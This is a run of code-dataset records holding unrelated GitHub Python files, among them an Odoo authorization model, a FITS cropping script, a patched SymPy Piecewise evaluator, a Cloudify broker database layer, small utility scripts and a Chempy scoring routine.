fields.One2many(comodel_name='res.users.sale.authorization',\n inverse_name='res_user_id')\n stock_authorization_ids = fields.One2many(comodel_name='res.users.stock.authorization',\n inverse_name='res_user_id')\n\n @api.multi\n def write(self, values):\n super(InheritedResUsers, self).write(values)\n # clear caches linked to the users\n self.env['ir.model.access'].call_cache_clearing_methods()\n self.env['ir.rule'].clear_caches()\n self.has_group.clear_cache(self)\n\n def get_authorized_sa_owner(self):\n owner_list = [False, self.id]\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules:\n for owner in rules[0].owner_ids:\n owner_list.append(owner.id)\n return owner_list\n\n def get_authorized_sa_partner(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_authorized_so_owner(self):\n owner_list = [False, self.id]\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules:\n for owner in rules[0].owner_ids:\n owner_list.append(owner.id)\n return owner_list\n\n def get_authorized_so_partner(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_authorized_sa_owner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules and rules[0].owner_ids:\n owner_list = rules[0].owner_ids.ids\n else:\n owner_list = self.env['res.users'].sudo().search([]).ids\n return owner_list\n\n def get_authorized_sa_partner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_agreement')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_authorized_so_owner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules and rules[0].owner_ids:\n owner_list = rules[0].owner_ids.ids\n else:\n owner_list = self.env['res.users'].sudo().search([]).ids\n return owner_list\n\n def get_authorized_so_partner_all_leads(self):\n rules = self.sale_authorization_ids.filtered(lambda x: x.document_type == 'sale_order')\n if rules and rules[0].partner_ids:\n partner_list = rules.partner_ids.ids\n else:\n partner_list = self.env['res.partner'].sudo().search([('parent_id', '=', False)]).ids\n return partner_list\n\n def get_stock_authorized(self):\n stock_picking_type_list = []\n rules = self.stock_authorization_ids\n if rules:\n for rule in rules:\n stock_picking_type_list.extend(rule.stock_picking_type_ids.ids)\n else:\n stock_picking_type_list = self.env['stock.picking.type'].sudo().search([]).ids\n return stock_picking_type_list\n\n\nclass ResUsersSaleAuthorization(models.Model):\n _name = \"res.users.sale.authorization\"\n _description = \"Sale Authorization\"\n\n res_user_id = fields.Many2one(comodel_name='res.users')\n document_type = fields.Selection([\n ('sale_agreement', 'Sale Agreement'),\n ('sale_order', 'Sale Order'),\n 
],\n required=True,\n string='Document Type'\n )\n owner_ids = fields.Many2many('res.users', 'sale_authorization_res_user_rel', 'sale_authorization_id',\n 'owner_id', string='Owner')\n partner_ids = fields.Many2many('res.partner', 'sale_authorization_res_partner_rel',\n 'sale_authorization_id', 'partner_id',\n domain=[('parent_id', '=', False)],\n string='Partner')\n\n\nclass ResUsersStockAuthorization(models.Model):\n _name = \"res.users.stock.authorization\"\n _description = \"Stock Authorization\"\n\n res_user_id = fields.Many2one(comodel_name='res.users')\n\n stock_warehouse_id = fields.Many2one('stock.warehouse', required=True, string='Warehouse')\n stock_picking_type_ids = fields.Many2many('stock.picking.type', 'stock_authorization_stock_picking_type_rel',\n 'stock_authorization_id', 'stock_picking_type_id',\n string='Stock Picking Type')\n","repo_name":"nguyenvu16102001/ndtl","sub_path":"sit_addons/ndtl_contacts/models/inherited_res_users.py","file_name":"inherited_res_users.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"33487949197","text":"from BaseModel import BaseModel\nimport re\n\n\nclass UrlModel(BaseModel):\n\n def __init__(self):\n super(UrlModel, self).__init__()\n\n # this is Django's url regex\n self.__url_regex = re.compile(\n r'^(?:http|ftp)s?://' # http:// or https://\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\n r'localhost|' # localhost...\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\n r'(?::\\d+)?' # optional port\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\n\n def generate_confidence(self, preceding_stripes, slot_values, following_stripes):\n\n matches = [z for z in slot_values if re.search(self.__url_regex, z) is not None]\n\n confidence = float(len([z for z in matches if z[1]])) / float(len(slot_values))\n\n return confidence\n","repo_name":"inferlink/landmark-rest","sub_path":"landmarkrest/field_predictor/field_models/UrlModel.py","file_name":"UrlModel.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"25058008287","text":"'''\n NAME: auto_crop_fits\n\n DESCRIPTION: Automatically crops a folder of FITS files, given a list \n of center coordinates and a list of radii. \n \t\t\t\t\tUses Pyraf. \n\n EXECUTION COMMAND: \n python auto_crop_fits.py\n\n INPUTS: Files: X.XXXGyr.fit\n where X.XXXGyr denotes the time of the snapshot. \n all_centers.txt \n The output of get_center.py; 3 columns (name \n of file without .fit(s) extension, x-coord,\n y-coord)\n r_max.txt \n A list of radii for all .fit(s) files in \n all_centers.txt, in the same order. \n\n OUTPUTS: Files: X.XXXGyr_crop.fit \n\n NOTES: Change the input & output file names, etc., as needed. \n May be modified to work with a list of original image\n dimensions or read them individually from original \n image FITS headers. \n May be modified to check that dimensions of cropped\n image do not exceed those of original. \n \t\t\t\t\t\n REVISION HISTORY: Written by J.E. Berlanga Medina. \n Last edited June 22, 2014. \n\n\n'''\n\n# ----------------- Code begins here -------------------\n\n#!/usr/bin/env python\n\nimport numpy\nfrom pyraf import iraf \nimport sys\n\n\n# Grab the data from all_centers.txt. 
\nfits_images_to_crop = numpy.loadtxt(\"all_centers.txt\", dtype='S', usecols=(0,))\norig_x_center, orig_y_center = numpy.loadtxt(\"all_centers.txt\", usecols=(1,2), unpack=True)\n\n# Grab the data from r_max.txt.\nr_max_radii = numpy.loadtxt(\"r_max.txt\", usecols=(0,))\n\n# Check that the lengths of all_centers.txt & r_max.txt are the same.\nif len(fits_images_to_crop) != len(r_max_radii):\n print(\"\\n\")\n print(\"all_centers.txt & r_max.txt don't have the same number of rows.\")\n print(\"Re-check your data. You can do this from a Unix terminal with: cat | wc -l\")\n sys.exit()\n# End of loop. \n\n# Crop all images. \nfor i in range(0,len(fits_images_to_crop)):\n #print(\"image name: \"+str(fits_images_to_crop[i][0:8]))\n low_crop_x = int(orig_x_center[i] - r_max_radii[i])\n #print(\"low_crop_x: \"+str(low_crop_x))\n high_crop_x = int(orig_x_center[i] + r_max_radii[i])\n #print(\"high_crop_x: \"+str(high_crop_x))\n low_crop_y = int(orig_y_center[i] - r_max_radii[i])\n #print(\"low_crop_y: \"+str(low_crop_y))\n high_crop_y = int(orig_y_center[i] + r_max_radii[i])\n #print(\"high_crop_y: \"+str(high_crop_y))\n iraf.imcopy.input=str(fits_images_to_crop[i][0:8])+\".fit[\"+str(low_crop_x)+\":\"+str(high_crop_x)+\",\"+str(low_crop_y)+\":\"+str(high_crop_y)+\"]\"\n iraf.imcopy.output=str(fits_images_to_crop[i][0:8])+\"_crop.fit\"\n iraf.imcopy()\n# End of loop.\n\n\n# ----------------- End of code ----------------------","repo_name":"AGES-UARK/2dfft_utils","sub_path":"2dfft_utils/misc/auto_crop_fits.py","file_name":"auto_crop_fits.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"22498540617","text":"\"\"\"\nCopied from Piecewise SymPy. The only modification is in `piecewise_eval` where\n\n```\n for e, c in _args:\n if not c.is_Atom and not isinstance(c, Relational):\n free = c.free_symbols\n```\n\nis changed to\n\n```\n for e, c in _args:\n if not c.is_Atom and not isinstance(c, Relational):\n free = c.expr_free_symbols\n```\n\nSee the following links:\nhttps://github.com/sympy/sympy/issues/14933\nhttps://github.com/pycalphad/pycalphad/pull/180\n\n\"\"\"\n\nimport sympy.functions.elementary.piecewise\nfrom sympy.core import S, Function, Dummy, Tuple\nfrom sympy.core.basic import as_Basic\nfrom sympy.core.relational import Relational, _canonical\nfrom sympy.logic.boolalg import And, Boolean, distribute_and_over_or, Or, true, false\nfrom sympy.utilities.misc import filldedent, func_name\n\n# Removes ITE rewriting, which is not compatible with SymEngine\ndef exprcondpair_new(cls, expr, cond):\n expr = as_Basic(expr)\n if cond == True:\n return Tuple.__new__(cls, expr, true)\n elif cond == False:\n return Tuple.__new__(cls, expr, false)\n\n if not isinstance(cond, Boolean):\n raise TypeError(filldedent('''\n Second argument must be a Boolean,\n not `%s`''' % func_name(cond)))\n return Tuple.__new__(cls, expr, cond)\n\ndef piecewise_eval(cls, *_args):\n if not _args:\n return\n\n if len(_args) == 1 and _args[0][-1] == True:\n return _args[0][0]\n\n newargs = [] # the unevaluated conditions\n current_cond = set() # the conditions up to a given e, c pair\n # make conditions canonical\n args = []\n for e, c in _args:\n if not c.is_Atom and not isinstance(c, Relational):\n free = c.expr_free_symbols\n if len(free) == 1:\n funcs = [i for i in c.atoms(Function)\n if not isinstance(i, Boolean)]\n if len(funcs) == 1 and len(\n c.xreplace({list(funcs)[0]: Dummy()}\n ).free_symbols) == 1:\n # we can 
treat function like a symbol\n free = funcs\n _c = c\n x = free.pop()\n try:\n c = c.as_set().as_relational(x)\n except NotImplementedError:\n pass\n else:\n reps = {}\n for i in c.atoms(Relational):\n ic = i.canonical\n if ic.rhs in (S.Infinity, S.NegativeInfinity):\n if not _c.has(ic.rhs):\n # don't accept introduction of\n # new Relationals with +/-oo\n reps[i] = S.true\n elif ('=' not in ic.rel_op and\n c.xreplace({x: i.rhs}) !=\n _c.xreplace({x: i.rhs})):\n reps[i] = Relational(\n i.lhs, i.rhs, i.rel_op + '=')\n c = c.xreplace(reps)\n args.append((e, _canonical(c)))\n\n for expr, cond in args:\n # Check here if expr is a Piecewise and collapse if one of\n # the conds in expr matches cond. This allows the collapsing\n # of Piecewise((Piecewise((x,x<0)),x<0)) to Piecewise((x,x<0)).\n # This is important when using piecewise_fold to simplify\n # multiple Piecewise instances having the same conds.\n # Eventually, this code should be able to collapse Piecewise's\n # having different intervals, but this will probably require\n # using the new assumptions.\n if isinstance(expr, sympy.functions.elementary.piecewise.Piecewise):\n unmatching = []\n for i, (e, c) in enumerate(expr.args):\n if c in current_cond:\n # this would already have triggered\n continue\n if c == cond:\n if c != True:\n # nothing past this condition will ever\n # trigger and only those args before this\n # that didn't match a previous condition\n # could possibly trigger\n if unmatching:\n expr = sympy.functions.elementary.piecewise.Piecewise(*(\n unmatching + [(e, c)]))\n else:\n expr = e\n break\n else:\n unmatching.append((e, c))\n\n # check for condition repeats\n got = False\n # -- if an And contains a condition that was\n # already encountered, then the And will be\n # False: if the previous condition was False\n # then the And will be False and if the previous\n # condition is True then then we wouldn't get to\n # this point. In either case, we can skip this condition.\n for i in ([cond] +\n (list(cond.args) if isinstance(cond, And) else\n [])):\n if i in current_cond:\n got = True\n break\n if got:\n continue\n\n # -- if not(c) is already in current_cond then c is\n # a redundant condition in an And. 
This does not\n # apply to Or, however: (e1, c), (e2, Or(~c, d))\n # is not (e1, c), (e2, d) because if c and d are\n # both False this would give no results when the\n # true answer should be (e2, True)\n if isinstance(cond, And):\n nonredundant = []\n for c in cond.args:\n if (isinstance(c, Relational) and\n (~c).canonical in current_cond):\n continue\n nonredundant.append(c)\n cond = cond.func(*nonredundant)\n elif isinstance(cond, Relational):\n if (~cond).canonical in current_cond:\n cond = S.true\n\n current_cond.add(cond)\n\n # collect successive e,c pairs when exprs or cond match\n if newargs:\n if newargs[-1].expr == expr:\n orcond = Or(cond, newargs[-1].cond)\n if isinstance(orcond, (And, Or)):\n orcond = distribute_and_over_or(orcond)\n newargs[-1] = sympy.functions.elementary.piecewise.ExprCondPair(expr, orcond)\n continue\n elif newargs[-1].cond == cond:\n orexpr = Or(expr, newargs[-1].expr)\n if isinstance(orexpr, (And, Or)):\n orexpr = distribute_and_over_or(orexpr)\n newargs[-1] = sympy.functions.elementary.piecewise.ExprCondPair(orexpr, cond)\n continue\n\n newargs.append(sympy.functions.elementary.piecewise.ExprCondPair(expr, cond))\n\n # some conditions may have been redundant\n missing = len(newargs) != len(_args)\n # some conditions may have changed\n same = all(a == b for a, b in zip(newargs, _args))\n # if either change happened we return the expr with the\n # updated args\n if not newargs:\n raise ValueError(filldedent('''\n There are no conditions (or none that\n are not trivially false) to define an\n expression.'''))\n if missing or not same:\n return cls(*newargs)\n","repo_name":"HUISUN24/pycalphad","sub_path":"pycalphad/core/patched_piecewise.py","file_name":"patched_piecewise.py","file_ext":"py","file_size_in_byte":7387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5709873939","text":"import pandas as pd\nimport plotly.express as px\nfrom dash import dcc, html, Dash\nfrom dash.dependencies import Input, Output, State\nfrom dash_visualization import ids, data_extraction, main\nimport numpy as np\n\n\ndef load_aggregated_load_profiles():\n all_load_profiles = pd.DataFrame()\n for country in main.COUNTRIES:\n for year in main.YEARS:\n try:\n ref_load, sems_load = main.LoadProfileAnalyser(f\"D5.4_{country}_{year}\", country, year).load_aggregated_load_profiles()\n ref_load.columns = [\"price ID\", \"reference\"]\n sems_load.columns = [\"price ID\", \"optimization\"]\n df = pd.concat([ref_load, sems_load.drop(columns=[\"price ID\"])], axis=1)\n melted = df.melt(value_vars=[\"reference\", \"optimization\"], id_vars=\"price ID\", var_name=\"mode\", value_name=\"Load (GW)\")\n melted[\"country\"] = country\n melted[\"year\"] = year\n melted[\"hour\"] = np.hstack((np.arange(8760), np.arange(8760)))\n all_load_profiles = pd.concat([all_load_profiles, melted], axis=0)\n except:\n print(f\"Load profiles for {country} {year} could not be loaded\")\n return all_load_profiles.reset_index(drop=True)\n\n\nALL_LOAD_PROFILES = load_aggregated_load_profiles()\n\n\n\ndef plot_aggregated_load_profiles(app: Dash) -> html.Div:\n n_rows = len(list(ALL_LOAD_PROFILES[\"year\"].unique()))\n fig = px.line(\n data_frame=ALL_LOAD_PROFILES,\n x=\"hour\",\n y=\"Load (GW)\",\n color=\"country\",\n facet_row=\"year\",\n line_dash=\"mode\",\n width=1_200,\n height=300*n_rows\n )\n return html.Div(dcc.Graph(figure=fig), id=ids.AGGREGATED_LOAD_PROFILE_CHART)\n\n\n\n\nif __name__ == \"__main__\":\n 
load_aggregated_load_profiles()\n\n","repo_name":"H2020-newTRENDs/FLEX","sub_path":"dash_visualization/aggregated_load_profile_figure.py","file_name":"aggregated_load_profile_figure.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"73"} +{"seq_id":"35705006768","text":"# Database utilities\n\nfrom sqlalchemy import create_engine, Table, Column, MetaData, Integer, String, ForeignKey, Boolean\nfrom sqlalchemy.sql import select, func\nfrom sqlalchemy.orm import sessionmaker\nimport threading\n\n\nclass Database(object):\n\n def __init__(self, dbpath):\n self._lock = threading.Lock()\n\n with(self._lock):\n engine = create_engine('sqlite:///'+dbpath,\n connect_args={'check_same_thread':False})\n self._session = sessionmaker(bind=engine, autocommit = False)() \n metadata = MetaData()\n \n self._blueprints = Table('Blueprints', metadata,\n Column('id', Integer, unique=True, primary_key=True),\n Column('cloudify_id', String),\n Column('description', String),\n Column('binder', String),\n Column('binder_config', String)\n )\n \n self._deployments = Table('Deployments', metadata,\n Column('deployment_id', String, primary_key=True),\n Column('blueprint_id', Integer),\n Column('outputs', String),\n Column('last_operation', String))\n \n self._inputs = Table('Inputs', metadata,\n Column('id', Integer, primary_key=True),\n Column('blueprint', Integer),\n Column('name', String),\n Column('type', String),\n Column('description', String),\n Column('default', String)\n )\n \n self._tags = Table('Tags', metadata,\n Column('id', Integer, primary_key=True),\n Column('blueprint', Integer),\n Column('tag', String))\n \n self._requires = Table('Requires', metadata,\n Column('id', Integer, primary_key=True),\n Column('blueprint', Integer),\n Column('permission', String))\n \n metadata.create_all(engine)\n\n\n ######################################################################\n # Inserts a cloudify server (UNUSED)\n #\n def set_server(self, id, ip, port, tenant_name, user_name, password): \n with(self._lock):\n ins = server.insert().values(id = id, ip = ip, port = port,\n tenant_name = tenant_name,\n user_name = user_name, password = password)\n conn.execute(ins)\n\n\n ######################################################################\n # List blueprints in database\n #\n # return in catalog syntax for convenience. 
If canonical is true, ensure\n # proper service catalog naming [-a-zA-Z0-9]\n #\n def list_blueprints(self, canonical=False):\n with(self._lock):\n results = {}\n services = []\n rows = self._session.execute(select([self._blueprints]))\n for row in rows:\n name = row['cloudify_id'].replace('_','-') if canonical else row['cloudify_id']\n service = {'name':name,\n 'id':str(row['id']),\n 'description':row['description'],\n 'binder': row['binder']\n }\n if not service['description'] or len(service['description']) ==0:\n service['description'] = 'undescribed'\n services.append(service)\n results['services'] = services\n return results\n\n \n ######################################################################\n # Get blueprint by id\n #\n def get_blueprint_by_id(self,id):\n with(self._lock):\n row = self._session.execute(select([self._blueprints]).where(\n self._blueprints.c.id == id)).fetchone()\n return row\n \n ######################################################################\n # Get blueprint by instance/deployment id\n #\n def get_blueprint_by_deployment_id(self,instance_id):\n with(self._lock):\n row = self._session.execute(select([self._deployments]).where(\n self._deployments.c.deployment_id == instance_id)).fetchone()\n return self._session.execute(select([self._blueprints]).where(\n self._blueprints.c.id == row['blueprint_id'])).fetchone()\n \n\n ######################################################################\n # List inputs in database for a blueprint\n #\n def list_inputs(self, blueprint_id):\n with(self._lock):\n rows = self._session.execute(select([self._inputs]).where(\n self._inputs.c.blueprint == blueprint_id))\n return rows\n\n\n ######################################################################\n # Create a deployment\n #\n def create_deployment(self, deployment_id, blueprint_id):\n with(self._lock):\n ins = self._deployments.insert().values(\n blueprint_id = blueprint_id,\n deployment_id = deployment_id,\n last_operation = \"started\") \n self._session.execute(ins)\n\n\n ######################################################################\n # Update deployment status\n #\n def update_deployment_status(self, deployment_id, status):\n with(self._lock):\n upd = self._deployments.update().values(last_operation = status).where(\n self._deployments.c.deployment_id == deployment_id)\n self._session.execute(upd)\n\n ######################################################################\n # Update deployment outputs\n #\n def update_deployment_outputs(self, deployment_id, outputs):\n with(self._lock):\n upd = self._deployments.update().values(outputs = outputs).where(\n self._deployments.c.deployment_id == deployment_id)\n self._session.execute(upd)\n\n ######################################################################\n # Get deployment status\n #\n def get_deployment_status(self, deployment_id):\n with(self._lock):\n row = self._session.execute(select([self._deployments]).where(\n self._deployments.c.deployment_id == deployment_id)).fetchone()\n if not row: return None\n return row['last_operation']\n\n ######################################################################\n # Get deployment\n #\n def get_deployment(self, deployment_id):\n with(self._lock):\n row = self._session.execute(select([self._deployments]).where(\n self._deployments.c.deployment_id == deployment_id)).fetchone()\n if not row: return None\n return row\n\n ######################################################################\n # Update db with blueprint info\n #\n def 
update_blueprints(self, blueprints):\n with(self._lock):\n for blueprint in blueprints:\n sel = select([func.count(self._blueprints)]).\\\n where(self._blueprints.c.cloudify_id == blueprint['id'])\n #add blueprint if not already there\n if self._session.execute(sel).fetchone()[0] == 0:\n ins = self._blueprints.insert().values(\n cloudify_id=blueprint['id'],\n description=blueprint['description'])\n bpid=self._session.execute(ins).inserted_primary_key\n for key,val in blueprint['plan']['inputs'].iteritems():\n inputin = self._inputs.insert().values(\n blueprint=bpid[0],\n name=key,\n type=val['type'] if 'type' in val else None,\n description=val['description'] if 'description' in val else None,\n default=val['default'] if 'default' in val and type(val) is not dict else None)\n self._session.execute(inputin)\n\n ######################################################################\n # Check binding\n #\n def binding_exists(self, binding_id):\n with(self._lock):\n row = self._session.execute(select([self._bindings]).where(\n self._bindings.c.id == binding_id)).fetchone()\n return row != None\n\n ######################################################################\n # Add binding. Returns success boolean\n #\n def add_binding(self, binding_id, instance_id, plan_id):\n try:\n with(self._lock):\n ins = self._bindins.insert().values( \n id = binding_id,\n instance = instance_id,\n plan = plan_id)\n self._session.execute(ins)\n except:\n return False\n return True\n\n ###################################################################\n # begin/commit/rollback\n\n def commit(self): self._session.commit()\n\n def rollback(self): self._session.rollback()\n \n def close(self): return self._session.close\n\n","repo_name":"dfilppi/service-broker","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"6148650678","text":"from lib.core.data import *\n\n\ndef set_running_options(args):\n # print(args)\n # Namespace(banner=False, file=None, plugin=None, search=None, url=None)\n\n # 指定批量导入url\n if args.file:\n running_config.multiurl = True\n \n if args.search:\n search_plugin(args)\n\n\ndef search_plugin(args):\n plugins_path = '/home/zeta/Test/vulnscan/test/plugins'\n plugins = os.listdir(plugins_path)\n print(plugins)\n print(dir(plugins))\n print(plugins.index('thinkphp'))\n print(plugins.index('hahahhah'))\n\nif __name__ == '__main__':\n search_plugin('1')\n","repo_name":"feverGeek/vulnscan","sub_path":"test/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"7479377384","text":"# Let this combine files together in a directory\nimport os\nimport time\n\n# Open Large File\nresultsDir = input(\"Please Provide diretory of files (just name): \")\nresultsDir = \"./\"+resultsDir\n\nprint(resultsDir)\n\nresultsList = os.listdir(resultsDir)\nresultsList.sort()\n\n# Appends new file, should create if not exist\nbigFileName = input(\"What is new file's name (.json is assumed)? 
\")\nbigFileName = \"./\"+bigFileName+\".json\"\nbigFile = open(bigFileName,\"a\")\n\ntotalFiles = len(resultsList)\nfileCounter = 0\n# Loop through files\nfor eachFile in resultsList:\n currentFile = open(resultsDir+\"/\"+eachFile,\"r\")\n fileCounter += 1\n for eachLine in currentFile:\n if fileCounter < totalFiles: # If not the last file\n if eachLine[-1] != \"\\n\": # If last char is not enter\n eachLine += \"\\n\" # Add enter to line\n bigFile.write(eachLine)\n # End For eachLine\n currentFile.close()\n# End For eachFile\nbigFile.close()\n\nprint(\"Mission Complete \\n closing in 3 seconds...\")\ntime.sleep(1)\nprint(\"... 2 Seconds...\")\ntime.sleep(1)\nprint(\"... 1 Second...\")\ntime.sleep(1)\nprint(\"GoodBye\")","repo_name":"ks982579/pythonFileParse","sub_path":"glueFiles.py","file_name":"glueFiles.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"15082964118","text":"# 8 inch by 50.5\n\ndef dimensions_rectangle():\n side1 = input(\"What is the first side of the rectangle (inches(? \")\n side2 = input(\"What is the second side of the rectangle (inches)? \")\n area = side1 * side2\n floor_boards = area\n print(\"The amount of floor boards is\", floor_boards)\n \n\ndef dimensions_not_rectangle():\n sides = input(\"How many sides are there to the room?\")\n if sides == 3:\n input(\"What is the length of the first side?\")\n input(\"What is the length of the second side?\")\n input(\"What is the length of the third side?\")\n elif sides == 4:\n input(\"What is the length of the first side?\")\n input(\"What is the length of the second side?\")\n input(\"What is the length of the third side?\")\n input(\"What is the length of the fourth side?\")\n elif sides == 5:\n input(\"What is the length of the first side?\")\n input(\"What is the length of the second side?\")\n input(\"What is the length of the third side?\")\n input(\"What is the length of the fourth side?\")\n input(\"What is the length of the fifth side?\")\n\n \n\n\ndef print_dashboard():\n # Printing the user interface\n print(\"[2] Floor boards if you know dimensions if rectangle(square foot)\")\n print(\"[3] Floor boards if you know the dimensions and not rectangle\")\n print(\"\")\n print(\"[0] Exit\")\n\n # Obtaining what function the user wants to input\n user_selection = input(\"What function do you want to choose? 
\")\n \n\n if user_selection == \"2\":\n dimensions_rectangle()\n return True\n\n elif user_selection == \"3\":\n dimensions_not_rectangle()\n return True\n \n elif user_selection == \"0\":\n print(\"Thank you for using my program :)\")\n return False\n \n else:\n print(\"Please choose either [1], [2], [3] or [0]\")\n return True\n\n\ndef main():\n program_running = True\n\n while program_running:\n program_running = print_dashboard()\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"girlingc/Python-Practice","sub_path":"Practice/square-footage.py","file_name":"square-footage.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38299721972","text":"import pygame\n\nNAVY = pygame.Color(0, 0, 128, 255)\nLTBLUE = pygame.Color(178, 223, 238, 255)\n\n\ndef input_or_default(default, input_value=None):\n if input_value == None:\n return default\n return input_value\n\n\nclass UIContext:\n def __init__(self, title=None, width=None, height=None, display_flags=None,\n font=None, font_size=None, bg_color=None, fg_color=None,\n location=None, size=None, align=None, len_cap=None,\n line_width=None):\n # Window title\n self.title = input_or_default(\"\", title)\n\n # Screen resolution width & height\n self.width = input_or_default(640, width)\n self.height = input_or_default(480, height)\n\n # Flags to set display mode, 0 = standard windows mode with frame\n self.display_flags = input_or_default(0, display_flags)\n\n # Font type and size. TTF required for packaging as .exe\n self.font = input_or_default(\"Comfortaa-Regular.ttf\", font)\n self.font_size = input_or_default(20, font_size)\n\n # Background and foreground pygame color objects\n self.bg_color = input_or_default(LTBLUE, bg_color)\n self.fg_color = input_or_default(NAVY, fg_color)\n\n # Location and size for objects\n self.location = input_or_default((0, 0), location)\n self.size = input_or_default((100, 25), size)\n\n # Alignment for objects, -1 = left, 0 = center, 1 = right\n self.align = input_or_default(-1, align)\n assert self.align == -1 or 0 or 1, \"align must be -1, 0, or 1\"\n\n # Length cap in number of characters, 0 = no cap\n self.len_cap = input_or_default(0, len_cap)\n\n # Outline width of drawn objects\n self.line_width = input_or_default(0, line_width)\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"CodeSkool/SimpleGUI2Pygame","sub_path":"Code/Shooter/utilities_1/ui/ui_context.py","file_name":"ui_context.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"85"} +{"seq_id":"8804969397","text":"def overall_Bayes():\n\t\"\"\"\n\tConvenience function to calculate the overall Bayes score, marginalizing over all parameters including beta.\n\tNB: in parameter.py, we must set the beta_parameter prior. 
5+-2.5 is used here in linear space.\n\t\"\"\"\n\timport numpy as np\n\timport os\n\tfrom .parameter import ModelParameters\n\tfrom .score_function import Bayes_score\n\t\n\tdirectory = 'OverallScores/'\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\t\t\n\ta = ModelParameters()\n\tintegral,integral_err = Bayes_score()\n\t\n\tnp.savez(\"OverallScores/Bayes_score - \"+str(a.yield_table_name_sn2)+\", \"+str(a.yield_table_name_agb)+\", \"+str(a.yield_table_name_1a)+\".npz\",\n\t\t\t\tscore=integral,\n\t\t\t\tscore_err=integral_err)\n\t\n\treturn integral,integral_err\n\t\ndef overall_CV():\n\t\"\"\"\n\tConvenience function to calculate overall CV score, running MCMC over all parameters including beta.\n\tNB: must set beta_param / log10_beta priors in parameter file\n\t\"\"\"\n\timport numpy as np\n\tfrom Chempy.parameter import ModelParameters\n\timport importlib\n\timport fileinput\n\timport sys \n\timport os\n\timport multiprocessing as mp\n\timport tqdm\n\tfrom Chempy.wrapper import single_star_optimization\n\tfrom Chempy.plot_mcmc import restructure_chain\n\tfrom Chempy.cem_function import posterior_function_mcmc_quick\n\tfrom scipy.stats import norm\n\tfrom .score_function import preload_params_mcmc\n\timport matplotlib.pyplot as plt\n\t#p = mp.Pool()\n\t\n\tdirectory = 'OverallScores/'\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\t \n\t## Code to rewrite parameter file for each element in turn, so as to run MCMC for 21/22 elements only\n\t# This is definitely not a good implementation (involves rewriting entire parameter file),\n\t# But other steps are far slower\n\t\n\t# Initialise arrays\n\telement_mean = []\n\telement_sigma = []\n\toverall_score = 1.\n\tfactors = []\n\t\n\t# Starting elements (copied from original parameter file)\n\tb = ModelParameters()\n\tstarting_el = b.elements_to_trace\n\torig = \"\\telements_to_trace = \"+str(starting_el) # Original element string\n\t#print(starting_el)\n\n\t# Calculate required Chempy elements\n\tpreload = preload_params_mcmc()\n\telements_init = np.copy(preload.elements)\n\tnp.save('Scores/CV_elements.npy',elements_init)\n\t#print(elements_init) \n \n\t# Create new parameter names\n\tnewstr = []\n\tfor i,el in enumerate(elements_init):\n\t\tif el !=starting_el[-1]:\n\t\t\tnewstr.append(orig.replace(\"'\"+str(el)+\"', \",\"\"))\n\t\telse:\n\t\t\tnewstr.append(orig.replace(\"'\"+str(el)+\"'\",\"\"))\n\tfor index in range(len(elements_init)): # Iterate over removed element\n\t\tfor line in fileinput.input(\"Chempy/parameter.py\", inplace=True):\n\t\t\tif \"\\telements_to_trace\" in line:\n\t\t\t\tprint(newstr[index])\n\t\t\t\t#print(line,end='') # TO TEST\n\t\t\telse:\n\t\t\t\tprint(line,end='')\n\t\tfileinput.close()\n\t\tdel sys.modules['Chempy.parameter']\n\t\tdel sys.modules['Chempy.score_function']\n\t\tfrom Chempy.parameter import ModelParameters\n\t\tfrom .score_function import preload_params_mcmc \n\t\ta = ModelParameters()\n\t\tpreload = 